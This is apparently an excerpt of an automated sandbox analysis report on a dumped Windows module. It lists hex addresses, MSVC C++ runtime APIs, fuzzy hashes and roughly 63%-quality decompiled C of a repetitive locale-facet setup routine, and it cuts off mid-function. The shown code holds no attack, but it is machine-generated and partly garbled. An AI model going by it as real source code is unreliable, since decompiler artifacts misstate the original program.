0x6d4810aa
0x6d4810ac
0x6d4810f1
0x6d4810f4
0x6d481100
0x6d4810ae
0x6d4810ae
0x6d4810b0
0x6d4810b6
0x6d4810bc
0x6d4810c4
0x6d4810c7
0x6d481104
0x6d481112
0x6d481117
0x6d481118
0x6d48111f
0x6d481129
0x6d48112e
0x6d481139
0x6d48113d
0x6d481140
0x6d481145
0x6d48114e
0x6d481150
0x6d481152
0x6d481197
0x6d48119a
0x6d4811a6
0x6d481154
0x6d481154
0x6d481156
0x6d48115c
0x6d481162
0x6d48116a
0x6d48116d
0x6d4811a7
0x6d4811aa
0x6d4811b8
0x6d4811bd
0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a
0x6d480f7d
0x6d480f7d
0x6d480f80
0x6d480f84
0x6d480f88
0x6d480f95
0x6d480f9d
0x6d480f9f
0x00000000
0x6d480f9f
0x6d480f66
0x6d480f66
0x00000000
0x6d480f66
0x6d480f64
0x6d480ed7
0x6d480ed7
0x6d480eda
0x6d480ede
0x6d480ee2
0x6d480eef
0x6d480ef7
0x6d480ef9
0x00000000
0x6d480ef9
0x6d480ec0
0x6d480ec0
0x00000000
0x6d480ec0
0x6d480ebe
0x6d480e31
0x6d480e31
0x6d480e34
0x6d480e38
0x6d480e3c
0x6d480e49
0x6d480e51
0x6d480e53
0x00000000
0x6d480e53
0x6d480e1a
0x6d480e1a
0x00000000
0x6d480e1a
0x6d480e18
0x6d480d8b
0x6d480d8b
0x6d480d8e
0x6d480d92
0x6d480d96
0x6d480da3
0x6d480dab
0x6d480dad
0x00000000
0x6d480dad
0x6d480d74
0x6d480d74
0x00000000
0x6d480d74
0x6d480d72
0x6d480ce5
0x6d480ce5
0x6d480ce8
0x6d480cec
0x6d480cf0
0x6d480cfd
0x6d480d05
0x6d480d07
0x00000000
0x6d480d07
0x6d480cce
0x6d480cce
0x00000000
0x6d480cce
0x6d480ccc
0x6d480c3f
0x6d480c3f
0x6d480c42
0x6d480c46
0x6d480c4a
0x6d480c57
0x6d480c5f
0x6d480c61
0x00000000
0x6d480c61
0x6d480c28
0x6d480c28
0x00000000
0x6d480c28
0x6d480c26
0x6d480b99
0x6d480b99
0x6d480b9c
0x6d480ba0
0x6d480ba4
0x6d480bb1
0x6d480bb9
0x6d480bbb
0x00000000
0x6d480bbb
0x6d480b82
0x6d480b82
0x00000000
0x6d480b82
0x6d480b80
0x6d480af3
0x6d480af3
0x6d480af6
0x6d480afa
0x6d480afe
0x6d480b0b
0x6d480b13
0x6d480b15
0x00000000
0x6d480b15
0x6d480adc
0x6d480adc
0x00000000
0x6d480adc
0x6d480ada
0x6d480a4d
0x6d480a4d
0x6d480a50
0x6d480a54
0x6d480a58
0x6d480a65
0x6d480a6d
0x6d480a6f
0x00000000
0x6d480a6f
0x6d480a36
0x6d480a36
0x00000000
0x6d480a36
0x6d480a34
0x6d4809a7
0x6d4809a7
0x6d4809aa
0x6d4809ae
0x6d4809b2
0x6d4809bf
0x6d4809c7
0x6d4809c9
0x00000000
0x6d4809c9
0x6d480990
0x6d480990
0x00000000
0x6d480990
0x6d48098e
0x6d480901
0x6d480901
0x6d480904
0x6d480908
0x6d48090c
0x6d480919
0x6d480921
0x6d480923
0x00000000
0x6d480923
0x6d4808ea
0x6d4808ea
0x00000000
0x6d4808ea
0x6d4808e8
0x6d48085b
0x6d48085b
0x6d48085e
0x6d480862
0x6d480866
0x6d480873
0x6d48087b
0x6d48087d
0x00000000
0x6d48087d
0x6d480844
0x6d480844
0x00000000
0x6d480844
0x6d480842
0x6d4807b5
0x6d4807b5
0x6d4807b8
0x6d4807bc
0x6d4807c0
0x6d4807cd
0x6d4807d5
0x6d4807d7
0x00000000
0x6d4807d7
0x6d48079e
0x6d48079e
0x00000000
0x6d48079e
0x6d48079c
0x6d48070f
0x6d48070f
0x6d480712
0x6d480716
0x6d48071a
0x6d480727
0x6d48072f
0x6d480731
0x00000000
0x6d480731
0x6d4806f8
0x6d4806f8
0x00000000
0x6d4806f8
0x6d4806f6
0x6d480669
0x6d480669
0x6d48066c
0x6d480670
0x6d480674
0x6d480681
0x6d480689
0x6d48068b
0x00000000
0x6d48068b
0x6d480652
0x6d480652
0x00000000
0x6d480652
0x6d480650
0x6d4805c3
0x6d4805c3
0x6d4805c6
0x6d4805ca
0x6d4805ce
0x6d4805db
0x6d4805e3
0x6d4805e5
0x00000000
0x6d4805e5
0x6d4805ac
0x6d4805ac
0x00000000
0x6d4805ac
0x6d4805aa
0x6d48051d
0x6d48051d
0x6d480520
0x6d480524
0x6d480528
0x6d480535
0x6d48053d
0x6d48053f
0x00000000
0x6d48053f
0x6d480506
0x6d480506
0x00000000
0x6d480506
0x6d480504

APIs

__EH_prolog3.LIBCMT ref: 6D4804CD
std::_Lockit::_Lockit.LIBCPMT ref: 6D4804D7

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

collate.LIBCPMT ref: 6D480511
std::_Facet_Register.LIBCPMT ref: 6D480528
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480548
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480566

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: dade0baa090db1713266acb54e7230213054e9cafe9aa64974ea93317d63c699
Instruction ID: 35853d34022c736bc9adaa1874975f74d622de95834dace82747b579904015f4
Opcode Fuzzy Hash: dade0baa090db1713266acb54e7230213054e9cafe9aa64974ea93317d63c699
Instruction Fuzzy Hash: 3D11AC728046299BCF05DFA5C884EEE7775AF84368F26040DD614AB290DF34EE058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480612, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6D480612(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t265;
				signed int _t266;
				void* _t278;
				void* _t291;
				void* _t304;
				void* _t317;
				void* _t330;
				void* _t343;
				void* _t356;
				void* _t369;
				void* _t382;
				void* _t395;
				void* _t408;
				void* _t421;
				void* _t434;
				void* _t447;
				void* _t460;
				void* _t473;
				void* _t486;
				signed int _t701;
				signed int _t759;
				signed int _t760;
				signed int _t761;
				signed int _t762;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t795;
				void* _t814;
				void* _t818;

				_t756 = __edx;
				_t575 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t814 - 0x14, 0);
				_t777 =  *0x6d53fdfc; // 0x0
				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
				 *(_t814 - 0x10) = _t777;
				_t265 = E6D451D10();
				_t578 =  *((intOrPtr*)(_t814 + 8));
				_t266 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t265);
				_t758 = _t266;
				if(_t266 != 0) {
					L5:
					E6D476A77(_t814 - 0x14);
					return E6D490E67(_t758);
				} else {
					if(_t777 == 0) {
						_push( *((intOrPtr*)(_t814 + 8)));
						_push(_t814 - 0x10);
						__eflags = E6D482355(__ebx, _t578, __edx, _t758, _t777, __eflags, _t818) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t814 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t758, _t777);
							E6D476A10(_t814 - 0x14, 0);
							_t778 =  *0x6d53fdcc; // 0x0
							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
							 *(_t814 - 0x10) = _t778;
							_t278 = E6D451D10();
							_t585 =  *((intOrPtr*)(_t814 + 8));
							_t759 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t278);
							__eflags = _t759;
							if(_t759 != 0) {
								L12:
								E6D476A77(_t814 - 0x14);
								return E6D490E67(_t759);
							} else {
								__eflags = _t778;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t814 + 8)));
									_push(_t814 - 0x10);
									__eflags = E6D4823BD(_t575, _t585, __edx, _t759, _t778, __eflags, _t818) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t814 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t575, _t759, _t778);
										E6D476A10(_t814 - 0x14, 0);
										_t779 =  *0x6d53fe00; // 0x0
										 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
										 *(_t814 - 0x10) = _t779;
										_t291 = E6D451D10();
										_t592 =  *((intOrPtr*)(_t814 + 8));
										_t760 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t291);
										__eflags = _t760;
										if(_t760 != 0) {
											L19:
											E6D476A77(_t814 - 0x14);
											return E6D490E67(_t760);
										} else {
											__eflags = _t779;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t814 + 8)));
												_push(_t814 - 0x10);
												__eflags = E6D482425(_t575, _t592, __edx, _t760, _t779, __eflags, _t818) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t814 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t575, _t760, _t779);
													E6D476A10(_t814 - 0x14, 0);
													_t780 =  *0x6d53fdd0; // 0x0
													 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
													 *(_t814 - 0x10) = _t780;
													_t304 = E6D451D10();
													_t599 =  *((intOrPtr*)(_t814 + 8));
													_t761 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t304);
													__eflags = _t761;
													if(_t761 != 0) {
														L26:
														E6D476A77(_t814 - 0x14);
														return E6D490E67(_t761);
													} else {
														__eflags = _t780;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t814 + 8)));
															_push(_t814 - 0x10);
															__eflags = E6D48248D(_t575, _t599, _t756, _t761, _t780, __eflags, _t818) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t814 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t575, _t761, _t780);
																E6D476A10(_t814 - 0x14, 0);
																_t781 =  *0x6d53fe04; // 0x0
																 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																 *(_t814 - 0x10) = _t781;
																_t317 = E6D451D10();
																_t606 =  *((intOrPtr*)(_t814 + 8));
																_t762 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t317);
																__eflags = _t762;
																if(_t762 != 0) {
																	L33:
																	E6D476A77(_t814 - 0x14);
																	return E6D490E67(_t762);
																} else {
																	__eflags = _t781;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t814 + 8)));
																		_push(_t814 - 0x10);
																		__eflags = E6D4824F5(_t575, _t606, _t756, _t762, _t781, __eflags, _t818) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D451940();
																			E6D4924F4(_t814 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(0x14);
																			E6D490E9E(0x6d4fe9a2, _t575, _t762, _t781);
																			E6D476A10(_t814 - 0x14, 0);
																			_t782 =  *0x6d53fdd4; // 0x0
																			 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																			 *(_t814 - 0x10) = _t782;
																			_t330 = E6D451D10();
																			_t613 =  *((intOrPtr*)(_t814 + 8));
																			_t763 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t330);
																			__eflags = _t763;
																			if(_t763 != 0) {
																				L40:
																				E6D476A77(_t814 - 0x14);
																				return E6D490E67(_t763);
																			} else {
																				__eflags = _t782;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t814 + 8)));
																					_push(_t814 - 0x10);
																					__eflags = E6D48255D(_t575, _t613, _t756, _t763, _t782, __eflags, _t818) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D451940();
																						E6D4924F4(_t814 - 0x20, 0x6d5329cc);
																						asm("int3");
																						_push(0x14);
																						E6D490E9E(0x6d4fe9a2, _t575, _t763, _t782);
																						E6D476A10(_t814 - 0x14, 0);
																						_t783 =  *0x6d53fe0c; // 0x0
																						 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																						 *(_t814 - 0x10) = _t783;
																						_t343 = E6D451D10();
																						_t620 =  *((intOrPtr*)(_t814 + 8));
																						_t764 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t343);
																						__eflags = _t764;
																						if(_t764 != 0) {
																							L47:
																							E6D476A77(_t814 - 0x14);
																							return E6D490E67(_t764);
																						} else {
																							__eflags = _t783;
																							if(__eflags == 0) {
																								_push( *((intOrPtr*)(_t814 + 8)));
																								_push(_t814 - 0x10);
																								__eflags = E6D4825C5(_t575, _t620, _t756, _t764, _t783, __eflags, _t818) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D451940();
																									E6D4924F4(_t814 - 0x20, 0x6d5329cc);
																									asm("int3");
																									_push(0x14);
																									E6D490E9E(0x6d4fe9a2, _t575, _t764, _t783);
																									E6D476A10(_t814 - 0x14, 0);
																									_t784 =  *0x6d53fe08; // 0x0
																									 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																									 *(_t814 - 0x10) = _t784;
																									_t356 = E6D451D10();
																									_t627 =  *((intOrPtr*)(_t814 + 8));
																									_t765 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t356);
																									__eflags = _t765;
																									if(_t765 != 0) {
																										L54:
																										E6D476A77(_t814 - 0x14);
																										return E6D490E67(_t765);
																									} else {
																										__eflags = _t784;
																										if(__eflags == 0) {
																											_push( *((intOrPtr*)(_t814 + 8)));
																											_push(_t814 - 0x10);
																											__eflags = E6D482649(_t575, _t627, _t756, _t765, _t784, __eflags, _t818) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D451940();
																												E6D4924F4(_t814 - 0x20, 0x6d5329cc);
																												asm("int3");
																												_push(0x14);
																												E6D490E9E(0x6d4fe9a2, _t575, _t765, _t784);
																												E6D476A10(_t814 - 0x14, 0);
																												_t785 =  *0x6d53fddc; // 0x0
																												 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																												 *(_t814 - 0x10) = _t785;
																												_t369 = E6D451D10();
																												_t634 =  *((intOrPtr*)(_t814 + 8));
																												_t766 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t369);
																												__eflags = _t766;
																												if(_t766 != 0) {
																													L61:
																													E6D476A77(_t814 - 0x14);
																													return E6D490E67(_t766);
																												} else {
																													__eflags = _t785;
																													if(__eflags == 0) {
																														_push( *((intOrPtr*)(_t814 + 8)));
																														_push(_t814 - 0x10);
																														__eflags = E6D4826CE(_t575, _t634, _t756, _t766, _t785, __eflags, _t818) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D451940();
																															E6D4924F4(_t814 - 0x20, 0x6d5329cc);
																															asm("int3");
																															_push(0x14);
																															E6D490E9E(0x6d4fe9a2, _t575, _t766, _t785);
																															E6D476A10(_t814 - 0x14, 0);
																															_t786 =  *0x6d53fdd8; // 0x0
																															 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																															 *(_t814 - 0x10) = _t786;
																															_t382 = E6D451D10();
																															_t641 =  *((intOrPtr*)(_t814 + 8));
																															_t767 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t382);
																															__eflags = _t767;
																															if(_t767 != 0) {
																																L68:
																																E6D476A77(_t814 - 0x14);
																																return E6D490E67(_t767);
																															} else {
																																__eflags = _t786;
																																if(__eflags == 0) {
																																	_push( *((intOrPtr*)(_t814 + 8)));
																																	_push(_t814 - 0x10);
																																	__eflags = E6D482752(_t575, _t641, _t756, _t767, _t786, __eflags, _t818) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D451940();
																																		E6D4924F4(_t814 - 0x20, 0x6d5329cc);
																																		asm("int3");
																																		_push(0x14);
																																		E6D490E9E(0x6d4fe9a2, _t575, _t767, _t786);
																																		E6D476A10(_t814 - 0x14, 0);
																																		_t787 =  *0x6d53fdec; // 0x0
																																		 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																		 *(_t814 - 0x10) = _t787;
																																		_t395 = E6D451D10();
																																		_t648 =  *((intOrPtr*)(_t814 + 8));
																																		_t768 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t395);
																																		__eflags = _t768;
																																		if(_t768 != 0) {
																																			L75:
																																			E6D476A77(_t814 - 0x14);
																																			return E6D490E67(_t768);
																																		} else {
																																			__eflags = _t787;
																																			if(__eflags == 0) {
																																				_push( *((intOrPtr*)(_t814 + 8)));
																																				_push(_t814 - 0x10);
																																				__eflags = E6D4827D7(_t575, _t648, _t756, _t768, _t787, __eflags, _t818) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D451940();
																																					E6D4924F4(_t814 - 0x20, 0x6d5329cc);
																																					asm("int3");
																																					_push(0x14);
																																					E6D490E9E(0x6d4fe9a2, _t575, _t768, _t787);
																																					E6D476A10(_t814 - 0x14, 0);
																																					_t788 =  *0x6d53fdc4; // 0x0
																																					 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																					 *(_t814 - 0x10) = _t788;
																																					_t408 = E6D451D10();
																																					_t655 =  *((intOrPtr*)(_t814 + 8));
																																					_t769 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t408);
																																					__eflags = _t769;
																																					if(_t769 != 0) {
																																						L82:
																																						E6D476A77(_t814 - 0x14);
																																						return E6D490E67(_t769);
																																					} else {
																																						__eflags = _t788;
																																						if(__eflags == 0) {
																																							_push( *((intOrPtr*)(_t814 + 8)));
																																							_push(_t814 - 0x10);
																																							__eflags = E6D48283F(_t575, _t655, _t756, _t769, _t788, __eflags, _t818) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D451940();
																																								E6D4924F4(_t814 - 0x20, 0x6d5329cc);
																																								asm("int3");
																																								_push(0x14);
																																								E6D490E9E(0x6d4fe9a2, _t575, _t769, _t788);
																																								E6D476A10(_t814 - 0x14, 0);
																																								_t789 =  *0x6d53fdf0; // 0x0
																																								 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																								 *(_t814 - 0x10) = _t789;
																																								_t421 = E6D451D10();
																																								_t662 =  *((intOrPtr*)(_t814 + 8));
																																								_t770 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t421);
																																								__eflags = _t770;
																																								if(_t770 != 0) {
																																									L89:
																																									E6D476A77(_t814 - 0x14);
																																									return E6D490E67(_t770);
																																								} else {
																																									__eflags = _t789;
																																									if(__eflags == 0) {
																																										_push( *((intOrPtr*)(_t814 + 8)));
																																										_push(_t814 - 0x10);
																																										__eflags = E6D4828A7(_t575, _t662, _t756, _t770, _t789, __eflags, _t818) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D451940();
																																											E6D4924F4(_t814 - 0x20, 0x6d5329cc);
																																											asm("int3");
																																											_push(0x14);
																																											E6D490E9E(0x6d4fe9a2, _t575, _t770, _t789);
																																											E6D476A10(_t814 - 0x14, 0);
																																											_t790 =  *0x6d53fdf4; // 0x0
																																											 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																											 *(_t814 - 0x10) = _t790;
																																											_t434 = E6D451D10();
																																											_t669 =  *((intOrPtr*)(_t814 + 8));
																																											_t771 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t434);
																																											__eflags = _t771;
																																											if(_t771 != 0) {
																																												L96:
																																												E6D476A77(_t814 - 0x14);
																																												return E6D490E67(_t771);
																																											} else {
																																												__eflags = _t790;
																																												if(__eflags == 0) {
																																													_push( *((intOrPtr*)(_t814 + 8)));
																																													_push(_t814 - 0x10);
																																													__eflags = E6D48290F(_t575, _t669, _t756, _t771, _t790, __eflags, _t818) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6D451940();
																																														E6D4924F4(_t814 - 0x20, 0x6d5329cc);
																																														asm("int3");
																																														_push(0x14);
																																														E6D490E9E(0x6d4fe9a2, _t575, _t771, _t790);
																																														E6D476A10(_t814 - 0x14, 0);
																																														_t791 =  *0x6d53fe10; // 0x0
																																														 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																														 *(_t814 - 0x10) = _t791;
																																														_t447 = E6D451D10();
																																														_t676 =  *((intOrPtr*)(_t814 + 8));
																																														_t772 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t447);
																																														__eflags = _t772;
																																														if(_t772 != 0) {
																																															L103:
																																															E6D476A77(_t814 - 0x14);
																																															return E6D490E67(_t772);
																																														} else {
																																															__eflags = _t791;
																																															if(__eflags == 0) {
																																																_push( *((intOrPtr*)(_t814 + 8)));
																																																_push(_t814 - 0x10);
																																																__eflags = E6D48298A(_t575, _t676, _t756, _t772, _t791, __eflags, _t818) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6D451940();
																																																	E6D4924F4(_t814 - 0x20, 0x6d5329cc);
																																																	asm("int3");
																																																	_push(0x14);
																																																	E6D490E9E(0x6d4fe9a2, _t575, _t772, _t791);
																																																	E6D476A10(_t814 - 0x14, 0);
																																																	_t792 =  *0x6d53fde0; // 0x0
																																																	 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																	 *(_t814 - 0x10) = _t792;
																																																	_t460 = E6D451D10();
																																																	_t683 =  *((intOrPtr*)(_t814 + 8));
																																																	_t773 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t460);
																																																	__eflags = _t773;
																																																	if(_t773 != 0) {
																																																		L110:
																																																		E6D476A77(_t814 - 0x14);
																																																		return E6D490E67(_t773);
																																																	} else {
																																																		__eflags = _t792;
																																																		if(__eflags == 0) {
																																																			_push( *((intOrPtr*)(_t814 + 8)));
																																																			_push(_t814 - 0x10);
																																																			__eflags = E6D4829F6(_t575, _t683, _t756, _t773, _t792, __eflags, _t818) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6D451940();
																																																				E6D4924F4(_t814 - 0x20, 0x6d5329cc);
																																																				asm("int3");
																																																				_push(0x14);
																																																				E6D490E9E(0x6d4fe9a2, _t575, _t773, _t792);
																																																				E6D476A10(_t814 - 0x14, 0);
																																																				_t793 =  *0x6d53fe14; // 0x0
																																																				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																				 *(_t814 - 0x10) = _t793;
																																																				_t473 = E6D451D10();
																																																				_t690 =  *((intOrPtr*)(_t814 + 8));
																																																				_t774 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t473);
																																																				__eflags = _t774;
																																																				if(_t774 != 0) {
																																																					L117:
																																																					E6D476A77(_t814 - 0x14);
																																																					return E6D490E67(_t774);
																																																				} else {
																																																					__eflags = _t793;
																																																					if(__eflags == 0) {
																																																						_push( *((intOrPtr*)(_t814 + 8)));
																																																						_push(_t814 - 0x10);
																																																						__eflags = E6D482A62(_t575, _t690, _t756, _t774, _t793, __eflags, _t818) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6D451940();
																																																							E6D4924F4(_t814 - 0x20, 0x6d5329cc);
																																																							asm("int3");
																																																							_push(0x14);
																																																							E6D490E9E(0x6d4fe9a2, _t575, _t774, _t793);
																																																							E6D476A10(_t814 - 0x14, 0);
																																																							_t794 =  *0x6d53fde4; // 0x0
																																																							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																							 *(_t814 - 0x10) = _t794;
																																																							_t486 = E6D451D10();
																																																							_t697 =  *((intOrPtr*)(_t814 + 8));
																																																							_t775 = E6D452140( *((intOrPtr*)(_t814 + 8)), _t486);
																																																							__eflags = _t775;
																																																							if(_t775 != 0) {
																																																								L124:
																																																								E6D476A77(_t814 - 0x14);
																																																								return E6D490E67(_t775);
																																																							} else {
																																																								__eflags = _t794;
																																																								if(__eflags == 0) {
																																																									_push( *((intOrPtr*)(_t814 + 8)));
																																																									_push(_t814 - 0x10);
																																																									__eflags = E6D482AC8(_t575, _t697, _t756, _t775, _t794, __eflags, _t818) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										_t701 = _t814 - 0x20;
																																																										E6D451940();
																																																										E6D4924F4(_t814 - 0x20, 0x6d5329cc);
																																																										asm("int3");
																																																										_push(4);
																																																										E6D490E9E(0x6d4fefbc, _t575, _t775, _t794);
																																																										_t795 = _t701;
																																																										 *(_t814 - 0x10) = _t795;
																																																										 *((intOrPtr*)(_t795 + 4)) =  *((intOrPtr*)(_t814 + 0xc));
																																																										_push( *((intOrPtr*)(_t814 + 0x14)));
																																																										_push( *((intOrPtr*)(_t814 + 8)));
																																																										_t259 = _t814 - 4;
																																																										 *_t259 =  *(_t814 - 4) & 0x00000000;
																																																										__eflags =  *_t259;
																																																										 *_t795 = 0x6d5041ac;
																																																										 *((char*)(_t795 + 0x28)) =  *((intOrPtr*)(_t814 + 0x10));
																																																										E6D4868B7(_t575, _t701, _t756, _t775, _t795,  *_t259, _t818);
																																																										return E6D490E67(_t795);
																																																									} else {
																																																										_t775 =  *(_t814 - 0x10);
																																																										 *(_t814 - 0x10) = _t775;
																																																										 *(_t814 - 4) = 1;
																																																										E6D478A0B(__eflags, _t775);
																																																										 *0x6d5001e8();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t775 + 4))))();
																																																										 *0x6d53fde4 = _t775;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t775 = _t794;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t774 =  *(_t814 - 0x10);
																																																							 *(_t814 - 0x10) = _t774;
																																																							 *(_t814 - 4) = 1;
																																																							E6D478A0B(__eflags, _t774);
																																																							 *0x6d5001e8();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t774 + 4))))();
																																																							 *0x6d53fe14 = _t774;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t774 = _t793;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t773 =  *(_t814 - 0x10);
																																																				 *(_t814 - 0x10) = _t773;
																																																				 *(_t814 - 4) = 1;
																																																				E6D478A0B(__eflags, _t773);
																																																				 *0x6d5001e8();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t773 + 4))))();
																																																				 *0x6d53fde0 = _t773;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t773 = _t792;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t772 =  *(_t814 - 0x10);
																																																	 *(_t814 - 0x10) = _t772;
																																																	 *(_t814 - 4) = 1;
																																																	E6D478A0B(__eflags, _t772);
																																																	 *0x6d5001e8();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t772 + 4))))();
																																																	 *0x6d53fe10 = _t772;
																																																	goto L103;
																																																}
																																															} else {
																																																_t772 = _t791;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t771 =  *(_t814 - 0x10);
																																														 *(_t814 - 0x10) = _t771;
																																														 *(_t814 - 4) = 1;
																																														E6D478A0B(__eflags, _t771);
																																														 *0x6d5001e8();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t771 + 4))))();
																																														 *0x6d53fdf4 = _t771;
																																														goto L96;
																																													}
																																												} else {
																																													_t771 = _t790;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t770 =  *(_t814 - 0x10);
																																											 *(_t814 - 0x10) = _t770;
																																											 *(_t814 - 4) = 1;
																																											E6D478A0B(__eflags, _t770);
																																											 *0x6d5001e8();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t770 + 4))))();
																																											 *0x6d53fdf0 = _t770;
																																											goto L89;
																																										}
																																									} else {
																																										_t770 = _t789;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t769 =  *(_t814 - 0x10);
																																								 *(_t814 - 0x10) = _t769;
																																								 *(_t814 - 4) = 1;
